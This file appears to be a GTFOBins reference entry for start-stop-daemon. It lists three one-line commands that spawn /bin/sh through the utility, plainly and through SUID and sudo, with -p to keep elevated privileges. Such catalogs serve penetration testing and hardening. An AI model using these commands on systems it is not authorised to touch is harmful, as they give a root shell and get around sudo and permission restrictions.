GTFOBins.github.io/_gtfobins/start-stop-daemon.md

10 lines
222 B
Markdown

---
functions:
shell:
- code: start-stop-daemon -n $RANDOM -S -x /bin/sh
suid:
- code: ./start-stop-daemon -n $RANDOM -S -x /bin/sh -- -p
sudo:
- code: sudo start-stop-daemon -n $RANDOM -S -x /bin/sh
---